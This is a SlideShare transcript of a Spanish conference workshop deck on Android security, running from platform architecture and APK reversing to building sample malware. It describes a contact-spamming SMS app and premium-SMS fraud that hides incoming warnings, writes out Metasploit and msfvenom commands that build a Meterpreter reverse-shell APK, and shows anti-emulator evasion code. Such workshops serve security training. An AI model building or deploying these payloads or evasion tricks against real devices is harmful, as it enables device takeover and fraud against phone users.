SlideShare una empresa de Scribd logo
1 de 54
Descargar para leer sin conexión
Taller de Android desde 0 hasta
generar nuestro primer malware
Seguridad e inseguridad en Android
Índice
 Sobre mi
 Android desde 0
 Reversing APKs
 Creando nuestro malware: HolaMundo
 Creando nuestro malware: SMS Receiver
 Creando nuestro malware: Metasploit
 Escondiendo el bicho
 Pentesting APKs
 Porque
 Dónde
 El futuro
 Bibliografía
Sobre mi
 Graduada en Sistemas Informáticos.
 Auditora de seguridad en el código.
Indra.
 Miembro-Fundadora de Gr2Dest.
https://es.linkedin.com/pub/maría-rojo/25/19/8b8
http://ensaladadebits.blogspot.com.es/
http://www.gr2dest.org/
https://github.com/mirojo
Android desde 0
 Arquitectura Android
 Componentes Android
 Broadcast
 Activity
 Service
 Content Provider
 Manifest
 IPC
 Sandbox Android
Arquitectura Android
Componentes Android
Componentes Android
 Broadcast Receiver:
Elemento para poder emitir
y responder a mensajes de
otras aplicaciones o del
sistema.
Componentes Android
 Activity:
Son las pantallas visuales de las aplicaciones.
Componentes Android
 Service
Ejecuta tareas en
segundo plano sin
bloquear la interfaz de
usuario.
Componentes Android
 Content Provider
Provee de la capacidad para poder compartir información
entre diferentes aplicaciones.
IPC
 IPC es Inter Process Comunication. Son aquellos mecanismos
que dispone Android para que los componentes se
comuniquen entre sí:
 Un intent es la descripción abstracta de una operación que se va a
llevar a cabo. O dicho de otro modo, un Intent es una clase que
permite especificar una Activity a ejecutar, llamando a uno de los
métodos de la clase Activity con ese Intent de parámetro. Esta
considerado como el mecanismo universal para pasar datos entre
procesos.
 Bundles: Semejante a la serialización pero más rápido.
 Binders: Entidad que permite a las actividades y servicios obtener
referencias a otros servicios. Permite no solo el envío de mensajes a
servicios sino directamente invocar métodos de ellos. El más usado
en RPC-style. Este elemento es una de las piedras angulares en el
patrón de seguridad Android. Se recomienda su uso para entornos
seguros.
Android Sandbox
Android Manifest
 Archivo XML que se genera al crear el proyecto, es
imprescindible dado que en están recogidas tocas las
especificaciones, componentes y permisos de todos los
elemento que forman la aplicación.
 Entender este archivo no es complejo y sí vital para la
detección de malware.
Ejemplo Lighter
Ejemplo HackWifi
Ejemplo Dendroid
Una APP por dentro
Una APP por dentro
Índice
 Sobre mi
 Android desde 0
 Reversing APKs
 Creando nuestro malware: HolaMundo
 Creando nuestro malware: SMS Receiver
 Creando nuestro malware: Metasploit
 Escondiendo el bicho
 Pentesting APKs
 Porque
 Dónde
 El futuro
 Bibliografía
Reversing APK
 APKTool
 Todo en uno.
 Muy actualizada.
 Deserializa AndroidManifest
 Decodifica los recursos
 De-construye y construye
http://ibotpeaches.github.io/Apktool/
Reversing APK
 Dex2Jar
 Menos funciones.
 Genera un jar desde una APK
 Puede generar código Jasmin
Smali es el formato dex usado por la DVM
Jasmin lenguaje en el que se basa Smali, su
sintaxis.
https://github.com/pxb1988/dex2jar
Reversing APK
JAR SMALI
Reversing APK
Reversing APK
 apktool d app.apk
 Modificar código smali
 apktool.jar b app app2.apk
 Firmar la APK
jarsigner -verbose -keystore C:Usersmirojonavaja_negra.jks
-storepass 123456 -keypass 123456
D:AndroidAPKTool201lighterdistapp.apk mirojo
Reversing APK
 d2j-dex2jar app.apk
 Abrir con JD-GUI
 File -> Save all Sources (Ctrl+Alt+S)
 Abrir con el editor Android Studio, Eclipse…
Reversing APK
 Problemas:
 Hay que montar el proyecto. Copiar las carpetas generadas
con APKTool: assets, res y el AndroidManifest.
 No se realiza un reversing completo por lo que no se puede
volver a compilar.
Índice
 Sobre mi
 Android desde 0
 Reversing APKs
 Creando nuestro malware: HolaMundo
 Creando nuestro malware: SMS Receiver
 Creando nuestro malware: Metasploit
 Escondiendo el bicho
 Pentesting APKs
 Porque
 Dónde
 El futuro
 Bibliografía
Malware
 Creando nuestro malware: HolaMundo
 Creando nuestro malware: SMS Receiver
 Creando nuestro malware: Metasploit
Creando nuestro malware:
HolaMundo
 Dos Activity
 Activity 1: Solo muestra un formulario.
 Activity 2:
 Recorre toda la agenda de contactos.
 Manda un SMS a cada uno de ellos.
 El mensaje del SMS puede ser maligno.
Creando nuestro malware: SMS
Receiver
 Abrimos el programa.
 Lanza un SMS de forma invisible al usuario a un destino
con un mensaje predefinido. Simulador de SMS de alta en
servicios de pago.
 El servicio de pago devuelve un SMS
 Se bloquea el SMS para que el usuario no pueda ver el
aviso de mensaje entrante y no sea consciente del timo.
Creando nuestro malware: Metasploit
 Activamos que Metasploit quede a la escucha.
help search
search platform:android
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
show options
set LHOST 192.168..
set LPORT
exploit
Creando nuestro malware: Metasploit
 Creamos el malware de Metasploit
msfvenom -p android/meterpreter/reverse_tcp LHOST=1
92.68.. LPORT=6764 R > navaja.apk
 Instalamos el malware en un dispositivo
adb install navaja.apk
https://www.offensive-security.com/metasploit-
unleashed/meterpreter-basics/
Índice
 Sobre mi
 Android desde 0
 Reversing APKs
 Creando nuestro malware: HolaMundo
 Creando nuestro malware: SMS Receiver
 Creando nuestro malware: Metasploit
 Escondiendo el bicho
 Pentesting APKs
 Porque
 Dónde
 El futuro
 Bibliografía
Escondiendo el bicho
 Ofuscación: ProGuard
Escondiendo el bicho
 Anti Emuladores
public boolean checkEmulation() {
TelephonyManager mng = (TelephonyManager)
getApplicationContext().getSystemService("phone");
if (mng.getSimOperatorName().equals("Android") ||
mng.getNetworkOperatorName().equals("Android")) {
return true;
}
return false;
}
Escondiendo el bicho
 Anti Debuggers
Escondiendo el bicho
 Anti Antivirus
Índice
 Sobre mi
 Android desde 0
 Reversing APKs
 Creando nuestro malware: HolaMundo
 Creando nuestro malware: SMS Receiver
 Creando nuestro malware: Metasploit
 Escondiendo el bicho
 Pentesting APKs
 Porque
 Dónde
 El futuro
 Bibliografía
Pentesting APK
 Preparando el entorno
 Auditando con BurpSuite
 Auditando con WireShark
Pentesting APK
 Maquinas virtuales.
 Recomendado tener varias API, actualmente 18,19,22 y 23.
Pentesting APK
Pentesting APK
 BurpSuite configuración.
Pentesting APK
 Configurar proxy en el emulador.
 Pasos en la API22 con Genymotion.
Pentesting APK
Pentesting APK
Índice
 Sobre mi
 Android desde 0
 Reversing APKs
 Creando nuestro malware: HolaMundo
 Creando nuestro malware: SMS Receiver
 Creando nuestro malware: Metasploit
 Escondiendo el bicho
 Pentesting APKs
 Porque
 Dónde
 El futuro
 Bibliografía
Por qué
 Por dinero.
 SMS de pago
 Fraude de publicidad/BlackSeo
 Venta de malware “a la carta”
 Venta de datos personales
El límite es tu imaginación.
Dónde
 Google Play
 Markets APPs no oficiales
 Foros
 Redes sociales/Blogs….
 Infectado desde elementos de confianza (Ejemplo
HolaMundo).
 P2P
Otra vez… El límite es tu imaginación.
El futuro
El futuro
El futuro
Bibliografía
 http://www.welivesecurity.com/la-es/2015/09/08/malware-
movil-evasion-en-android/
 http://contagiominidump.blogspot.com.es/
https://koodous.com
¿¿Dudas??
Muchas gracias

Más contenido relacionado

Similar a Taller Android Navaja Negra 5 ED

IOF Labs Weekend - Android (27082011)
IOF Labs Weekend - Android (27082011)IOF Labs Weekend - Android (27082011)
IOF Labs Weekend - Android (27082011)repcax
 
Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdfJosé Moreno
 
PhoneGap
PhoneGapPhoneGap
PhoneGapcccori
 
Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Julian Maximiliano Zarate
 
Curso de Android 4.x Unidad 02 SDK y AVD Manager
Curso de Android 4.x Unidad 02 SDK y AVD ManagerCurso de Android 4.x Unidad 02 SDK y AVD Manager
Curso de Android 4.x Unidad 02 SDK y AVD ManagerDavid Vaquero
 
Seguridad en android.ppt
Seguridad en android.pptSeguridad en android.ppt
Seguridad en android.pptfabibmx7
 
Overview Alljoyn SDK presented at SedeLab Webimar.
 Overview Alljoyn SDK presented at SedeLab Webimar. Overview Alljoyn SDK presented at SedeLab Webimar.
Overview Alljoyn SDK presented at SedeLab Webimar.Felipe Martinez Alvarez
 
Recurso multimedia
Recurso multimediaRecurso multimedia
Recurso multimedia123alin
 
Evolución de las soluciones antimalware
Evolución de las soluciones antimalwareEvolución de las soluciones antimalware
Evolución de las soluciones antimalwareEventos Creativos
 
Empresa de seguridad rootnit android malware
Empresa de seguridad rootnit android malwareEmpresa de seguridad rootnit android malware
Empresa de seguridad rootnit android malwareDavid Thomas
 
Presentacion Plataformas moviles
Presentacion Plataformas movilesPresentacion Plataformas moviles
Presentacion Plataformas movilesDr. Edwin Hernandez
 

Similar a Taller Android Navaja Negra 5 ED (20)

IOF Labs Weekend - Android (27082011)
IOF Labs Weekend - Android (27082011)IOF Labs Weekend - Android (27082011)
IOF Labs Weekend - Android (27082011)
 
Taller deandroid
Taller deandroidTaller deandroid
Taller deandroid
 
Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdf
 
PhoneGap
PhoneGapPhoneGap
PhoneGap
 
Entornos-de-Desarrollo-Eclipse-y-Android-SDK
Entornos-de-Desarrollo-Eclipse-y-Android-SDKEntornos-de-Desarrollo-Eclipse-y-Android-SDK
Entornos-de-Desarrollo-Eclipse-y-Android-SDK
 
Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014Análisis de malware en Android -.Bsides Chile 2014
Análisis de malware en Android -.Bsides Chile 2014
 
Curso de Android 4.x Unidad 02 SDK y AVD Manager
Curso de Android 4.x Unidad 02 SDK y AVD ManagerCurso de Android 4.x Unidad 02 SDK y AVD Manager
Curso de Android 4.x Unidad 02 SDK y AVD Manager
 
Seguridad en android.ppt
Seguridad en android.pptSeguridad en android.ppt
Seguridad en android.ppt
 
Seguridad en android.ppt
Seguridad en android.pptSeguridad en android.ppt
Seguridad en android.ppt
 
Overview Alljoyn SDK presented at SedeLab Webimar.
 Overview Alljoyn SDK presented at SedeLab Webimar. Overview Alljoyn SDK presented at SedeLab Webimar.
Overview Alljoyn SDK presented at SedeLab Webimar.
 
Recurso multimedia
Recurso multimediaRecurso multimedia
Recurso multimedia
 
Evolución de las soluciones antimalware
Evolución de las soluciones antimalwareEvolución de las soluciones antimalware
Evolución de las soluciones antimalware
 
Empresa de seguridad rootnit android malware
Empresa de seguridad rootnit android malwareEmpresa de seguridad rootnit android malware
Empresa de seguridad rootnit android malware
 
Visual Studio App Center
Visual Studio App CenterVisual Studio App Center
Visual Studio App Center
 
Iniciación a Android
Iniciación a AndroidIniciación a Android
Iniciación a Android
 
Presentacion Plataformas moviles
Presentacion Plataformas movilesPresentacion Plataformas moviles
Presentacion Plataformas moviles
 
tehnik mobile hacking
tehnik mobile hackingtehnik mobile hacking
tehnik mobile hacking
 
Curso Desarrollo Android
Curso Desarrollo AndroidCurso Desarrollo Android
Curso Desarrollo Android
 
Aplicacion android
Aplicacion androidAplicacion android
Aplicacion android
 
Aplicacion Android
Aplicacion Android  Aplicacion Android
Aplicacion Android
 

Último

Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersIván López Martín
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxJOSEMANUELHERNANDEZH11
 
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...AlanCedillo9
 
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...JaquelineJuarez15
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdfIsabellaMontaomurill
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...FacuMeza2
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 
ejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofJuancarlosHuertasNio1
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIAWilbisVega
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesFundación YOD YOD
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024GiovanniJavierHidalg
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 

Último (20)

Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptx
 
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
 
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
ejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sof
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento Protégeles
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 

Taller Android Navaja Negra 5 ED

  • 1. Taller de Android desde 0 hasta generar nuestro primer malware Seguridad e inseguridad en Android
  • 2. Índice  Sobre mi  Android desde 0  Reversing APKs  Creando nuestro malware: HolaMundo  Creando nuestro malware: SMS Receiver  Creando nuestro malware: Metasploit  Escondiendo el bicho  Pentesting APKs  Porque  Dónde  El futuro  Bibliografía
  • 3. Sobre mi  Graduada en Sistemas Informáticos.  Auditora de seguridad en el código. Indra.  Miembro-Fundadora de Gr2Dest. https://es.linkedin.com/pub/maría-rojo/25/19/8b8 http://ensaladadebits.blogspot.com.es/ http://www.gr2dest.org/ https://github.com/mirojo
  • 4. Android desde 0  Arquitectura Android  Componentes Android  Broadcast  Activity  Service  Content Provider  Manifest  IPC  Sandbox Android
  • 7. Componentes Android  Broadcast Receiver: Elemento para poder emitir y responder a mensajes de otras aplicaciones o del sistema.
  • 8. Componentes Android  Activity: Son las pantallas visuales de las aplicaciones.
  • 9. Componentes Android  Service Ejecuta tareas en segundo plano sin bloquear la interfaz de usuario.
  • 10. Componentes Android  Content Provider Provee de la capacidad para poder compartir información entre diferentes aplicaciones.
  • 11. IPC  IPC es Inter Process Comunication. Son aquellos mecanismos que dispone Android para que los componentes se comuniquen entre sí:  Un intent es la descripción abstracta de una operación que se va a llevar a cabo. O dicho de otro modo, un Intent es una clase que permite especificar una Activity a ejecutar, llamando a uno de los métodos de la clase Activity con ese Intent de parámetro. Esta considerado como el mecanismo universal para pasar datos entre procesos.  Bundles: Semejante a la serialización pero más rápido.  Binders: Entidad que permite a las actividades y servicios obtener referencias a otros servicios. Permite no solo el envío de mensajes a servicios sino directamente invocar métodos de ellos. El más usado en RPC-style. Este elemento es una de las piedras angulares en el patrón de seguridad Android. Se recomienda su uso para entornos seguros.
  • 13. Android Manifest  Archivo XML que se genera al crear el proyecto, es imprescindible dado que en están recogidas tocas las especificaciones, componentes y permisos de todos los elemento que forman la aplicación.  Entender este archivo no es complejo y sí vital para la detección de malware.
  • 17. Una APP por dentro
  • 18. Una APP por dentro
  • 19. Índice  Sobre mi  Android desde 0  Reversing APKs  Creando nuestro malware: HolaMundo  Creando nuestro malware: SMS Receiver  Creando nuestro malware: Metasploit  Escondiendo el bicho  Pentesting APKs  Porque  Dónde  El futuro  Bibliografía
  • 20. Reversing APK  APKTool  Todo en uno.  Muy actualizada.  Deserializa AndroidManifest  Decodifica los recursos  De-construye y construye http://ibotpeaches.github.io/Apktool/
  • 21. Reversing APK  Dex2Jar  Menos funciones.  Genera un jar desde una APK  Puede generar código Jasmin Smali es el formato dex usado por la DVM Jasmin lenguaje en el que se basa Smali, su sintaxis. https://github.com/pxb1988/dex2jar
  • 24. Reversing APK  apktool d app.apk  Modificar código smali  apktool.jar b app app2.apk  Firmar la APK jarsigner -verbose -keystore C:Usersmirojonavaja_negra.jks -storepass 123456 -keypass 123456 D:AndroidAPKTool201lighterdistapp.apk mirojo
  • 25. Reversing APK  d2j-dex2jar app.apk  Abrir con JD-GUI  File -> Save all Sources (Ctrl+Alt+S)  Abrir con el editor Android Studio, Eclipse…
  • 26. Reversing APK  Problemas:  Hay que montar el proyecto. Copiar las carpetas generadas con APKTool: assets, res y el AndroidManifest.  No se realiza un reversing completo por lo que no se puede volver a compilar.
  • 27. Índice  Sobre mi  Android desde 0  Reversing APKs  Creando nuestro malware: HolaMundo  Creando nuestro malware: SMS Receiver  Creando nuestro malware: Metasploit  Escondiendo el bicho  Pentesting APKs  Porque  Dónde  El futuro  Bibliografía
  • 28. Malware  Creando nuestro malware: HolaMundo  Creando nuestro malware: SMS Receiver  Creando nuestro malware: Metasploit
  • 29. Creando nuestro malware: HolaMundo  Dos Activity  Activity 1: Solo muestra un formulario.  Activity 2:  Recorre toda la agenda de contactos.  Manda un SMS a cada uno de ellos.  El mensaje del SMS puede ser maligno.
  • 30. Creando nuestro malware: SMS Receiver  Abrimos el programa.  Lanza un SMS de forma invisible al usuario a un destino con un mensaje predefinido. Simulador de SMS de alta en servicios de pago.  El servicio de pago devuelve un SMS  Se bloquea el SMS para que el usuario no pueda ver el aviso de mensaje entrante y no sea consciente del timo.
  • 31. Creando nuestro malware: Metasploit  Activamos que Metasploit quede a la escucha. help search search platform:android use exploit/multi/handler set payload android/meterpreter/reverse_tcp show options set LHOST 192.168.. set LPORT exploit
  • 32. Creando nuestro malware: Metasploit  Creamos el malware de Metasploit msfvenom -p android/meterpreter/reverse_tcp LHOST=1 92.68.. LPORT=6764 R > navaja.apk  Instalamos el malware en un dispositivo adb install navaja.apk https://www.offensive-security.com/metasploit- unleashed/meterpreter-basics/
  • 33. Índice  Sobre mi  Android desde 0  Reversing APKs  Creando nuestro malware: HolaMundo  Creando nuestro malware: SMS Receiver  Creando nuestro malware: Metasploit  Escondiendo el bicho  Pentesting APKs  Porque  Dónde  El futuro  Bibliografía
  • 34. Escondiendo el bicho  Ofuscación: ProGuard
  • 35. Escondiendo el bicho  Anti Emuladores public boolean checkEmulation() { TelephonyManager mng = (TelephonyManager) getApplicationContext().getSystemService("phone"); if (mng.getSimOperatorName().equals("Android") || mng.getNetworkOperatorName().equals("Android")) { return true; } return false; }
  • 36. Escondiendo el bicho  Anti Debuggers
  • 37. Escondiendo el bicho  Anti Antivirus
  • 38. Índice  Sobre mi  Android desde 0  Reversing APKs  Creando nuestro malware: HolaMundo  Creando nuestro malware: SMS Receiver  Creando nuestro malware: Metasploit  Escondiendo el bicho  Pentesting APKs  Porque  Dónde  El futuro  Bibliografía
  • 39. Pentesting APK  Preparando el entorno  Auditando con BurpSuite  Auditando con WireShark
  • 40. Pentesting APK  Maquinas virtuales.  Recomendado tener varias API, actualmente 18,19,22 y 23.
  • 42. Pentesting APK  BurpSuite configuración.
  • 43. Pentesting APK  Configurar proxy en el emulador.  Pasos en la API22 con Genymotion.
  • 46. Índice  Sobre mi  Android desde 0  Reversing APKs  Creando nuestro malware: HolaMundo  Creando nuestro malware: SMS Receiver  Creando nuestro malware: Metasploit  Escondiendo el bicho  Pentesting APKs  Porque  Dónde  El futuro  Bibliografía
  • 47. Por qué  Por dinero.  SMS de pago  Fraude de publicidad/BlackSeo  Venta de malware “a la carta”  Venta de datos personales El límite es tu imaginación.
  • 48. Dónde  Google Play  Markets APPs no oficiales  Foros  Redes sociales/Blogs….  Infectado desde elementos de confianza (Ejemplo HolaMundo).  P2P Otra vez… El límite es tu imaginación.